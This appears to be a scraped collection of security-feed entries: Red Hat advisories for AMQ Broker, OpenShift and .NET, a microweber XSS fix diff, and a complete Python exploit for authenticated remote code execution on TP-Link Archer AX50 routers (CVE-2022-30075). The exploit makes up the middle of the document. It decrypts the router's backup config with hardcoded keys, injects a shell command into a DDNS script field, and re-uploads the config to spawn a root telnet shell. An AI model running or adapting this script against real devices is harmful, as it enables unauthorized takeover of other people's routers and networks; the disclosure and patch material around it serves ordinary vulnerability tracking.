Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Description:

AMQ Broker is a high-performance messaging implementation based on ActiveMQ  
Artemis. It uses an asynchronous journal for fast message persistence, and  
supports multiple languages, protocols, and platforms.

This release of Red Hat AMQ Broker 7.10.0 serves as a replacement for Red  
Hat AMQ Broker 7.9.4, and includes security and bug fixes, and  
enhancements. For further information, refer to the release notes linked to  
in the References section.

Security Fix(es):

* nodejs-lodash: prototype pollution in defaultsDeep function leading to  
modifying properties (CVE-2019-10744)

* amq: AMQ Broker Operator ClusterWide Edit Permissions Due Token Exposure  
(CVE-2022-1833)

* jackson-databind: denial of service via a large depth of nested objects  
(CVE-2020-36518)

* AMQ Broker: Malformed message can result in partial DoS (OOM)  
(CVE-2021-4040)

* netty: control chars in header names may lead to HTTP request smuggling  
(CVE-2021-43797)

* artemis-commons: Apache ActiveMQ Artemis DoS (CVE-2022-23913)

* springframework: Spring Framework: Data Binding Rules Vulnerability  
(CVE-2022-22968)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

3. Solution:

Before applying the update, back up your existing installation, including  
all applications, configuration files, databases and database settings, and  
so on.

The References section of this erratum contains a download link (you must  
log in to download the update).

4. Bugs fixed (https://bugzilla.redhat.com/):

1739497 - CVE-2019-10744 nodejs-lodash: prototype pollution in defaultsDeep function leading to modifying properties  
2028254 - CVE-2021-4040 AMQ Broker: Malformed message can result in partial DoS (OOM)  
2031958 - CVE-2021-43797 netty: control chars in header names may lead to HTTP request smuggling  
2063601 - CVE-2022-23913 artemis-commons: Apache ActiveMQ Artemis DoS  
2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects  
2075441 - CVE-2022-22968 Spring Framework: Data Binding Rules Vulnerability  
2089406 - CVE-2022-1833 amq: AMQ Broker Operator ClusterWide Edit Permissions Due Token Exposure

5. References:

https://access.redhat.com/security/cve/CVE-2019-10744  
https://access.redhat.com/security/cve/CVE-2020-36518  
https://access.redhat.com/security/cve/CVE-2021-4040  
https://access.redhat.com/security/cve/CVE-2021-43797  
https://access.redhat.com/security/cve/CVE-2022-1833  
https://access.redhat.com/security/cve/CVE-2022-22968  
https://access.redhat.com/security/cve/CVE-2022-23913  
https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/jbossnetwork/restricted/listSoftware.html?downloadType=distributions&product=jboss.amq.broker&version=7.10.0  
https://access.redhat.com/documentation/en-us/red_hat_amq_broker/

6. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqtvX9zjgjWX9erEAQiSVxAAozdM4qReUkfVxsjOM15+JKJwZTDhtGc9  
+DSkxxbLO4CR6NntO3Ue2rDiVb38jH2pQpHpIUST2ahapqmuh71C2eQamRMdtSmS  
uQkft3d1UuHh4CillEhRO98LOUGvucWxzIGntymqsKRwfrcB7NfARwmHXabYGSZq  
H1OHepSFKU7g2IIxiJqxDwj9DO87lSyah9XANYDtaUtMadNhJ0Gc2U2aN45lUC6S  
N6VA2IZAl6L3CT7bF8AKGFZd4eVbhPMkDHk0leVdle2kQoThXpuR4qr8h7s9/ZVc  
JnYjJHiaK/Qb1k5vfvjyQUiKtykdwEQ+atey628fZhhusEtCWorGJv6mFkaqbNcc  
2lAnJzCLBLvJHjWKlOfpGQey01A8m20zGdeJmyz8zlWwCPq0biXrCaXbjpMJ/9Mh  
ocDSLrxg5StRuRQ7stTeW3D7FQhP0aa7l6PwunWvepPqd3AXYSxCptfmHwzAaxQz  
qwMbJ7bM9ewuzRcZwalHDoUt5uquM1k/27rV1BFlAcz7XbCKhP5Uu+mzb3j415YS  
RmsS/c/f7zoV0M+cUkdRq7/tCN3+cyYfgY/s5PpGxvYo1vCe7TjYsxn07ylMPryA  
v+Qzrnb5SV+5Wuk7+BYkp42DR0MZmVAsq/kxoXMOCdW3GZiUc3W0tQZqsSMvjvxc  
CPv0F79fXT8=  
=g2zv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-5101-01

TP-Link AX50 router with firmware 210730 suffers from an authenticated remote code execution vulnerability.

    # Exploit Title: TP-Link Router AX50 firmware 210730 - Remote Code Execution (RCE) (Authenticated)# Exploit Author: Tomas Melicher# Technical Details: https://github.com/aaronsvk/CVE-2022-30075# Date: 2022-06-08# Vendor Homepage: https://www.tp-link.com/# Tested On: Tp-Link Archer AX50# Vulnerability Description: Remote Code Execution via importing malicious config file# CVE: CVE-2022-30075#!/usr/bin/python3import argparse # pip install argparseimport requests # pip install requestsimport binascii, base64, os, re, json, sys, time, math, random, hashlibimport tarfile, zlibfrom Crypto.Cipher import AES, PKCS1_v1_5, PKCS1_OAEP # pip install pycryptodomefrom Crypto.PublicKey import RSAfrom Crypto.Util.Padding import pad, unpadfrom Crypto.Random import get_random_bytesfrom urllib.parse import urlencodeclass WebClient(object):  def __init__(self, target, password):    self.target = target    self.password = password.encode('utf-8')    self.password_hash = hashlib.md5(('admin%s'%password).encode('utf-8')).hexdigest().encode('utf-8')    self.aes_key = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')    self.aes_iv = (str(time.time()) + str(random.random())).replace('.','')[0:AES.block_size].encode('utf-8')    self.stok = ''    self.session = requests.Session()    data = self.basic_request('/login?form=auth', {'operation':'read'})    if data['success'] != True:      print('[!] unsupported router')      return    self.sign_rsa_n = int(data['data']['key'][0], 16)    self.sign_rsa_e = int(data['data']['key'][1], 16)    self.seq = data['data']['seq']    data = self.basic_request('/login?form=keys', {'operation':'read'})    self.password_rsa_n = int(data['data']['password'][0], 16)    self.password_rsa_e = int(data['data']['password'][1], 16)    self.stok = self.login()  def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = pad(plaintext, aes_block_size)    return cipher.encrypt(plaintext_padded)  def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = cipher.decrypt(ciphertext)    plaintext = unpad(plaintext_padded, aes_block_size)    return plaintext  def rsa_encrypt(self, n, e, plaintext):    public_key = RSA.construct((n, e)).publickey()    encryptor = PKCS1_v1_5.new(public_key)    block_size = int(public_key.n.bit_length()/8) - 11    encrypted_text = ''    for i in range(0, len(plaintext), block_size):      encrypted_text += encryptor.encrypt(plaintext[i:i+block_size]).hex()    return encrypted_text  def download_request(self, url, post_data):    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, stream=True)    filepath = os.getcwd()+'/'+re.findall(r'(?<=filename=")[^"]+', res.headers['Content-Disposition'])[0]    if os.path.exists(filepath):      print('[!] can\'t download, file "%s" already exists' % filepath)      return    with open(filepath, 'wb') as f:      for chunk in res.iter_content(chunk_size=4096):        f.write(chunk)    return filepath  def basic_request(self, url, post_data, files_data={}):    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data=post_data, files=files_data)    return json.loads(res.content)  def encrypted_request(self, url, post_data):    serialized_data = urlencode(post_data)    encrypted_data = self.aes_encrypt(self.aes_key, self.aes_iv, AES.block_size, serialized_data.encode('utf-8'))    encrypted_data = base64.b64encode(encrypted_data)    signature = ('k=%s&i=%s&h=%s&s=%d'.encode('utf-8')) % (self.aes_key, self.aes_iv, self.password_hash, self.seq+len(encrypted_data))    encrypted_signature = self.rsa_encrypt(self.sign_rsa_n, self.sign_rsa_e, signature)    res = self.session.post('http://%s/cgi-bin/luci/;stok=%s%s'%(self.target,self.stok,url), data={'sign':encrypted_signature, 'data':encrypted_data}) # order of params is important    if(res.status_code != 200):      print('[!] url "%s" returned unexpected status code'%(url))      return    encrypted_data = json.loads(res.content)    encrypted_data = base64.b64decode(encrypted_data['data'])    data = self.aes_decrypt(self.aes_key, self.aes_iv, AES.block_size, encrypted_data)    return json.loads(data)  def login(self):    post_data = {'operation':'login', 'password':self.rsa_encrypt(self.password_rsa_n, self.password_rsa_e, self.password)}    data = self.encrypted_request('/login?form=login', post_data)    if data['success'] != True:      print('[!] login failed')      return    print('[+] logged in, received token (stok): %s'%(data['data']['stok']))    return data['data']['stok']class BackupParser(object):  def __init__(self, filepath):    self.encrypted_path = os.path.abspath(filepath)    self.decrypted_path = os.path.splitext(filepath)[0]    self.aes_key = bytes.fromhex('2EB38F7EC41D4B8E1422805BCD5F740BC3B95BE163E39D67579EB344427F7836') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua    self.iv = bytes.fromhex('360028C9064242F81074F4C127D299F6') # strings ./squashfs-root/usr/lib/lua/luci/model/crypto.lua  def aes_encrypt(self, aes_key, aes_iv, aes_block_size, plaintext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = pad(plaintext, aes_block_size)    return cipher.encrypt(plaintext_padded)  def aes_decrypt(self, aes_key, aes_iv, aes_block_size, ciphertext):    cipher = AES.new(aes_key, AES.MODE_CBC, iv=aes_iv)    plaintext_padded = cipher.decrypt(ciphertext)    plaintext = unpad(plaintext_padded, aes_block_size)    return plaintext  def encrypt_config(self):    if not os.path.isdir(self.decrypted_path):      print('[!] invalid directory "%s"'%(self.decrypted_path))      return    # encrypt, compress each .xml using zlib and add them to tar archive    with tarfile.open('%s/data.tar'%(self.decrypted_path), 'w') as tar:      for filename in os.listdir(self.decrypted_path):        basename,ext = os.path.splitext(filename)        if ext == '.xml':          xml_path = '%s/%s'%(self.decrypted_path,filename)          bin_path = '%s/%s.bin'%(self.decrypted_path,basename)          with open(xml_path, 'rb') as f:            plaintext = f.read()          if len(plaintext) == 0:            f = open(bin_path, 'w')            f.close()          else:            compressed = zlib.compress(plaintext)            encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)            with open(bin_path, 'wb') as f:              f.write(encrypted)          tar.add(bin_path, os.path.basename(bin_path))          os.unlink(bin_path)    # compress tar archive using zlib and encrypt    with open('%s/md5_sum'%(self.decrypted_path), 'rb') as f1, open('%s/data.tar'%(self.decrypted_path), 'rb') as f2:      compressed = zlib.compress(f1.read()+f2.read())    encrypted = self.aes_encrypt(self.aes_key, self.iv, AES.block_size, compressed)    # write into final config file    with open('%s'%(self.encrypted_path), 'wb') as f:      f.write(encrypted)    os.unlink('%s/data.tar'%(self.decrypted_path))  def decrypt_config(self):    if not os.path.isfile(self.encrypted_path):      print('[!] invalid file "%s"'%(self.encrypted_path))      return    # decrypt and decompress config file    with open(self.encrypted_path, 'rb') as f:      decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, f.read())    decompressed = zlib.decompress(decrypted)    os.mkdir(self.decrypted_path)    # store decrypted data into files    with open('%s/md5_sum'%(self.decrypted_path), 'wb') as f:      f.write(decompressed[0:16])    with open('%s/data.tar'%(self.decrypted_path), 'wb') as f:      f.write(decompressed[16:])    # untar second part of decrypted data    with tarfile.open('%s/data.tar'%(self.decrypted_path), 'r') as tar:      tar.extractall(path=self.decrypted_path)    # decrypt and decompress each .bin file from tar archive    for filename in os.listdir(self.decrypted_path):      basename,ext = os.path.splitext(filename)      if ext == '.bin':        bin_path = '%s/%s'%(self.decrypted_path,filename)        xml_path = '%s/%s.xml'%(self.decrypted_path,basename)        with open(bin_path, 'rb') as f:          ciphertext = f.read()        os.unlink(bin_path)        if len(ciphertext) == 0:          f = open(xml_path, 'w')          f.close()          continue        decrypted = self.aes_decrypt(self.aes_key, self.iv, AES.block_size, ciphertext)        decompressed = zlib.decompress(decrypted)        with open(xml_path, 'wb') as f:          f.write(decompressed)    os.unlink('%s/data.tar'%(self.decrypted_path))  def modify_config(self, command):    xml_path = '%s/ori-backup-user-config.xml'%(self.decrypted_path)    if not os.path.isfile(xml_path):      print('[!] invalid file "%s"'%(xml_path))      return    with open(xml_path, 'r') as f:      xml_content = f.read()    # https://openwrt.org/docs/guide-user/services/ddns/client#detecting_wan_ip_with_script    payload = '<service name="exploit">\n'    payload += '<enabled>on</enabled>\n'    payload += '<update_url>http://127.0.0.1/</update_url>\n'    payload += '<domain>x.example.org</domain>\n'    payload += '<username>X</username>\n'    payload += '<password>X</password>\n'    payload += '<ip_source>script</ip_source>\n'    payload += '<ip_script>%s</ip_script>\n' % (command.replace('<','<').replace('&','&'))    payload += '<interface>internet</interface>\n' # not worked for other interfaces    payload += '<retry_interval>5</retry_interval>\n'    payload += '<retry_unit>seconds</retry_unit>\n'    payload += '<retry_times>3</retry_times>\n'    payload += '<check_interval>12</check_interval>\n'    payload += '<check_unit>hours</check_unit>\n'    payload += '<force_interval>30</force_interval>\n'    payload += '<force_unit>days</force_unit>\n'    payload += '</service>\n'    if '<service name="exploit">' in xml_content:      xml_content = re.sub(r'<service name="exploit">[\s\S]+?</service>\n</ddns>', '%s</ddns>'%(payload), xml_content, 1)    else:      xml_content = xml_content.replace('</service>\n</ddns>', '</service>\n%s</ddns>'%(payload), 1)    with open(xml_path, 'w') as f:      f.write(xml_content)arg_parser = argparse.ArgumentParser()arg_parser.add_argument('-t', metavar='target', help='ip address of tp-link router', required=True)arg_parser.add_argument('-p', metavar='password', required=True)arg_parser.add_argument('-b', action='store_true', help='only backup and decrypt config')arg_parser.add_argument('-r', metavar='backup_directory', help='only encrypt and restore directory with decrypted config')arg_parser.add_argument('-c', metavar='cmd', default='/usr/sbin/telnetd -l /bin/login.sh', help='command to execute')args = arg_parser.parse_args()client = WebClient(args.t, args.p)parser = Noneif not args.r:  print('[*] downloading config file ...')  filepath = client.download_request('/admin/firmware?form=config_multipart', {'operation':'backup'})  if not filepath:    sys.exit(-1)  print('[*] decrypting config file "%s" ...'%(filepath))  parser = BackupParser(filepath)  parser.decrypt_config()  print('[+] successfully decrypted into directory "%s"'%(parser.decrypted_path))if not args.b and not args.r:  filepath = '%s_modified'%(parser.decrypted_path)  os.rename(parser.decrypted_path, filepath)  parser.decrypted_path = os.path.abspath(filepath)  parser.encrypted_path = '%s.bin'%(filepath)  parser.modify_config(args.c)  print('[+] modified directory with decrypted config "%s" ...'%(parser.decrypted_path))if not args.b:  if parser is None:    parser = BackupParser('%s.bin'%(args.r.rstrip('/')))  print('[*] encrypting directory with modified config "%s" ...'%(parser.decrypted_path))  parser.encrypt_config()  data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'read'})  timeout = data['data']['totaltime'] if data['success'] else 180  print('[*] uploading modified config file "%s"'%(parser.encrypted_path))  data = client.basic_request('/admin/firmware?form=config_multipart', {'operation':'restore'}, {'archive':open(parser.encrypted_path,'rb')})  if not data['success']:    print('[!] unexpected response')    print(data)    sys.exit(-1)  print('[+] config file successfully uploaded')  print('[*] router will reboot in few seconds... when it becomes online again (few minutes), try "telnet %s" and enjoy root shell !!!'%(args.t))

TP-Link AX50 Remote Code Execution

Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.17.

@@ -42,6 +42,7 @@ mw.liveeditCSSEditor = function (config) {

  

  

this.\_cssTemp \= function (json) {

  

var css \= CSSJSON.toCSS(json);

if(!mw.liveedit.\_cssTemp) {

mw.liveedit.\_cssTemp \= mw.tools.createStyle('#mw-liveedit-dynamic-temp-style', css, document.body);

@@ -51,9 +52,20 @@ mw.liveeditCSSEditor = function (config) {

}

};

  

var removeSheetRuleProperty \= function (selector, property) {

var sheet \= document.querySelector('link#mw-template-settings').sheet;

var i \= 0, l \= sheet.cssRules.length;

for ( ; i < l ; i++) {

if(sheet.cssRules\[i\].selectorText \=== selector) {

sheet.cssRules\[i\].style.removeProperty(property);

}

}

};

  

this.changed \= false;

this.\_temp \= {children: {}, attributes: {}};

this.temp \= function (node, prop, val) {

val \= (val || '').trim();

this.changed \= true;

if(node.length) {

node \= node\[0\];

@@ -65,7 +77,18 @@ mw.liveeditCSSEditor = function (config) {

if (!this.\_temp.children\[sel\].attributes ) {

this.\_temp.children\[sel\].attributes \= {};

}

  

  

this.\_temp.children\[sel\].attributes\[prop\] \= val;

  

if(val \=== '' || val \=== '!important') {

this.\_temp.children\[sel\].attributes\[prop\] \= '';

// delete this.\_temp.children\[sel\].attributes\[prop\];

removeSheetRuleProperty (sel, prop);

  

}

  

  

this.\_cssTemp(this.\_temp);

};

CVE-2022-2130: Merge branch 'dev' of github.com:microweber/microweber into dev · microweber/microweber@dbd37dd

Red Hat Security Advisory 2022-4965-01 - Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments. This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.7.53. There are no images for this advisory. Issues addressed include a memory exhaustion vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: OpenShift Container Platform 4.7.53 packages and security update  
Advisory ID:       RHSA-2022:4965-01  
Product:           Red Hat OpenShift Enterprise  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:4965  
Issue date:        2022-06-16  
CVE Names:         CVE-2022-1708   
=====================================================================

1. Summary:

Red Hat OpenShift Container Platform release 4.7.53 is now available with  
updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container  
Platform 4.7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat OpenShift Container Platform 4.7 - ppc64le, s390x, x86_64

3. Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing  
Kubernetes application platform solution designed for on-premise or private  
cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container  
Platform 4.7.53. There are no images for this advisory.

Security Fix(es):

* cri-o: memory exhaustion on the node when access to the kube api  
(CVE-2022-1708)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

All OpenShift Container Platform 4.7 users are advised to upgrade to these  
updated packages and images when they are available in the appropriate  
release channel. To check for available updates, use the OpenShift Console  
or the CLI oc command. Instructions for upgrading a cluster are available  
at  
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html

4. Solution:

For OpenShift Container Platform 4.7 see the following documentation, which  
will be updated shortly for this release, for important instructions on how  
to upgrade your cluster and fully apply this asynchronous errata update:

https://docs.openshift.com/container-platform/4.7/release_notes/ocp-4-7-release-notes.html

Details on how to access this content are available at  
https://docs.openshift.com/container-platform/4.7/updating/updating-cluster-cli.html

5. Bugs fixed (https://bugzilla.redhat.com/):

2085361 - CVE-2022-1708 cri-o: memory exhaustion on the node when access to the kube api

6. Package List:

Red Hat OpenShift Container Platform 4.7:

Source:  
conmon-2.0.29-3.rhaos4.7.el7.src.rpm  
cri-o-1.20.8-3.rhaos4.7.gitb9df556.el7.src.rpm

x86_64:  
conmon-2.0.29-3.rhaos4.7.el7.x86_64.rpm  
conmon-debuginfo-2.0.29-3.rhaos4.7.el7.x86_64.rpm  
cri-o-1.20.8-3.rhaos4.7.gitb9df556.el7.x86_64.rpm  
cri-o-debuginfo-1.20.8-3.rhaos4.7.gitb9df556.el7.x86_64.rpm

Red Hat OpenShift Container Platform 4.7:

Source:  
conmon-2.0.29-3.rhaos4.7.el8.src.rpm  
cri-o-1.20.8-3.rhaos4.7.gitb9df556.el8.src.rpm  
cri-tools-1.20.0-4.el8.src.rpm  
ignition-2.9.0-5.rhaos4.7.git1d56dc8.el8.src.rpm

ppc64le:  
conmon-2.0.29-3.rhaos4.7.el8.ppc64le.rpm  
conmon-debuginfo-2.0.29-3.rhaos4.7.el8.ppc64le.rpm  
conmon-debugsource-2.0.29-3.rhaos4.7.el8.ppc64le.rpm  
cri-o-1.20.8-3.rhaos4.7.gitb9df556.el8.ppc64le.rpm  
cri-o-debuginfo-1.20.8-3.rhaos4.7.gitb9df556.el8.ppc64le.rpm  
cri-o-debugsource-1.20.8-3.rhaos4.7.gitb9df556.el8.ppc64le.rpm  
cri-tools-1.20.0-4.el8.ppc64le.rpm  
cri-tools-debuginfo-1.20.0-4.el8.ppc64le.rpm  
cri-tools-debugsource-1.20.0-4.el8.ppc64le.rpm  
ignition-2.9.0-5.rhaos4.7.git1d56dc8.el8.ppc64le.rpm  
ignition-debuginfo-2.9.0-5.rhaos4.7.git1d56dc8.el8.ppc64le.rpm  
ignition-debugsource-2.9.0-5.rhaos4.7.git1d56dc8.el8.ppc64le.rpm  
ignition-validate-2.9.0-5.rhaos4.7.git1d56dc8.el8.ppc64le.rpm  
ignition-validate-debuginfo-2.9.0-5.rhaos4.7.git1d56dc8.el8.ppc64le.rpm

s390x:  
conmon-2.0.29-3.rhaos4.7.el8.s390x.rpm  
conmon-debuginfo-2.0.29-3.rhaos4.7.el8.s390x.rpm  
conmon-debugsource-2.0.29-3.rhaos4.7.el8.s390x.rpm  
cri-o-1.20.8-3.rhaos4.7.gitb9df556.el8.s390x.rpm  
cri-o-debuginfo-1.20.8-3.rhaos4.7.gitb9df556.el8.s390x.rpm  
cri-o-debugsource-1.20.8-3.rhaos4.7.gitb9df556.el8.s390x.rpm  
cri-tools-1.20.0-4.el8.s390x.rpm  
cri-tools-debuginfo-1.20.0-4.el8.s390x.rpm  
cri-tools-debugsource-1.20.0-4.el8.s390x.rpm  
ignition-2.9.0-5.rhaos4.7.git1d56dc8.el8.s390x.rpm  
ignition-debuginfo-2.9.0-5.rhaos4.7.git1d56dc8.el8.s390x.rpm  
ignition-debugsource-2.9.0-5.rhaos4.7.git1d56dc8.el8.s390x.rpm  
ignition-validate-2.9.0-5.rhaos4.7.git1d56dc8.el8.s390x.rpm  
ignition-validate-debuginfo-2.9.0-5.rhaos4.7.git1d56dc8.el8.s390x.rpm

x86_64:  
conmon-2.0.29-3.rhaos4.7.el8.x86_64.rpm  
conmon-debuginfo-2.0.29-3.rhaos4.7.el8.x86_64.rpm  
conmon-debugsource-2.0.29-3.rhaos4.7.el8.x86_64.rpm  
cri-o-1.20.8-3.rhaos4.7.gitb9df556.el8.x86_64.rpm  
cri-o-debuginfo-1.20.8-3.rhaos4.7.gitb9df556.el8.x86_64.rpm  
cri-o-debugsource-1.20.8-3.rhaos4.7.gitb9df556.el8.x86_64.rpm  
cri-tools-1.20.0-4.el8.x86_64.rpm  
cri-tools-debuginfo-1.20.0-4.el8.x86_64.rpm  
cri-tools-debugsource-1.20.0-4.el8.x86_64.rpm  
ignition-2.9.0-5.rhaos4.7.git1d56dc8.el8.x86_64.rpm  
ignition-debuginfo-2.9.0-5.rhaos4.7.git1d56dc8.el8.x86_64.rpm  
ignition-debugsource-2.9.0-5.rhaos4.7.git1d56dc8.el8.x86_64.rpm  
ignition-validate-2.9.0-5.rhaos4.7.git1d56dc8.el8.x86_64.rpm  
ignition-validate-debuginfo-2.9.0-5.rhaos4.7.git1d56dc8.el8.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-1708  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYqsa+9zjgjWX9erEAQjCBA//XuKHMB5VFNuOT18z4OljxD7g++8m5ajV  
HFQNdP5hmtcE3FLiPd5aJjyheDnHhr4wWH7GsjSQ7CUWRPZymh/1LJJNs5FZwUxT  
QGt2vY2Nms8qcwPo3kstKBLPNtY+0Fj6X7s2chcChsh+rc/pLXI1g6B1GkoT1Rj7  
sr+uVu1UuCbydao6duDRjIPTuSTEHGUHUPtVoOdrGXibGBObxaZlhsZuh8j0iNx9  
w0V2sEDxd34y8cohYfr/qvtMfHD3urGOKbMAVYDCBJPo0WoOLRqim4NN2YVHOgL4  
6pUlUNoVvrd5PQ4Gb+xg0E9LOwfNGpoYmOHU84BlH5GcOqVfJWJCD5zMEwp4/3uz  
hYgQNUH4JMur3Weg5Mum8bpQR3R5WirsPWF+wz6plL3VAL8mAHoJb9SEmVK6vkA/  
/LsMo6bDXRboliTuRTP7cggcV+Zl9IFCKbzQScMlOp8icsKWrczarhiPLNB3G1Nf  
k8I8LwzqwlZ/yBXmarPTRTbApqszNz5VITaUVOsDS+0tfZLXBP56IcYzR6z9q/HD  
J5WDx5c+UQ2PQKMiYIJR+kM2EBus1uxl+7l6QxVIDngYISdlcFi8Lgd6uw6CD/xn  
4/DEyT6BwVu6VfEO7jKBBqb/zuiy7hydIZOZWJHuxGjimBcJqezbJWD7DxU9a8Ov  
IsMS+CwIlZo=  
=quew  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-4965-01

Red Hat Security Advisory 2022-5050-01 - .NET is a managed-software framework. It implements a subset of the .NET framework APIs and several new APIs, and it includes a CLR implementation. New versions of .NET that address a security vulnerability are now available. The updated versions are .NET SDK 6.0.106 and .NET Runtime 6.0.6. Issues addressed include a password leak vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: .NET 6.0 security and bugfix update  
Advisory ID:       RHSA-2022:5050-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:5050  
Issue date:        2022-06-15  
CVE Names:         CVE-2022-30184   
=====================================================================

1. Summary:

An update for .NET 6.0 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat CodeReady Linux Builder (v. 9) - aarch64, s390x, x86_64  
Red Hat Enterprise Linux AppStream (v. 9) - aarch64, s390x, x86_64

3. Description:

.NET is a managed-software framework. It implements a subset of the .NET  
framework APIs and several new APIs, and it includes a CLR implementation.

New versions of .NET that address a security vulnerability are now  
available. The updated versions are .NET SDK 6.0.106 and .NET Runtime  
6.0.6.

Security Fix(es):

* dotnet: NuGet Credential leak due to loss of control of third party  
symbol server domain (CVE-2022-30184)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2096963 - CVE-2022-30184 dotnet: NuGet Credential leak due to loss of control of third party symbol server domain

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

Source:  
dotnet6.0-6.0.106-1.el9_0.src.rpm

aarch64:  
aspnetcore-runtime-6.0-6.0.6-1.el9_0.aarch64.rpm  
aspnetcore-targeting-pack-6.0-6.0.6-1.el9_0.aarch64.rpm  
dotnet-apphost-pack-6.0-6.0.6-1.el9_0.aarch64.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.6-1.el9_0.aarch64.rpm  
dotnet-host-6.0.6-1.el9_0.aarch64.rpm  
dotnet-host-debuginfo-6.0.6-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-6.0.6-1.el9_0.aarch64.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.6-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-6.0.6-1.el9_0.aarch64.rpm  
dotnet-runtime-6.0-debuginfo-6.0.6-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-6.0.106-1.el9_0.aarch64.rpm  
dotnet-sdk-6.0-debuginfo-6.0.106-1.el9_0.aarch64.rpm  
dotnet-targeting-pack-6.0-6.0.6-1.el9_0.aarch64.rpm  
dotnet-templates-6.0-6.0.106-1.el9_0.aarch64.rpm  
dotnet6.0-debuginfo-6.0.106-1.el9_0.aarch64.rpm  
dotnet6.0-debugsource-6.0.106-1.el9_0.aarch64.rpm  
netstandard-targeting-pack-2.1-6.0.106-1.el9_0.aarch64.rpm

s390x:  
aspnetcore-runtime-6.0-6.0.6-1.el9_0.s390x.rpm  
aspnetcore-targeting-pack-6.0-6.0.6-1.el9_0.s390x.rpm  
dotnet-apphost-pack-6.0-6.0.6-1.el9_0.s390x.rpm  
dotnet-apphost-pack-6.0-debuginfo-6.0.6-1.el9_0.s390x.rpm  
dotnet-host-6.0.6-1.el9_0.s390x.rpm  
dotnet-host-debuginfo-6.0.6-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-6.0.6-1.el9_0.s390x.rpm  
dotnet-hostfxr-6.0-debuginfo-6.0.6-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-6.0.6-1.el9_0.s390x.rpm  
dotnet-runtime-6.0-debuginfo-6.0.6-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-6.0.106-1.el9_0.s390x.rpm  
dotnet-sdk-6.0-debuginfo-6.0.106-1.el9_0.s390x.rpm  
dotnet-targeting-pack-6.0-6.0.6-1.el9_0.s390x.rpm  
dotnet-templates-6.0-6.0.106-1.el9_0.s390x.rpm  
dotnet6.0-debuginfo-6.0.106-1.el9_0.s390x.rpm  
dotnet6.0-debugsource-6.0.106-1.el9_0.s390x.rpm  
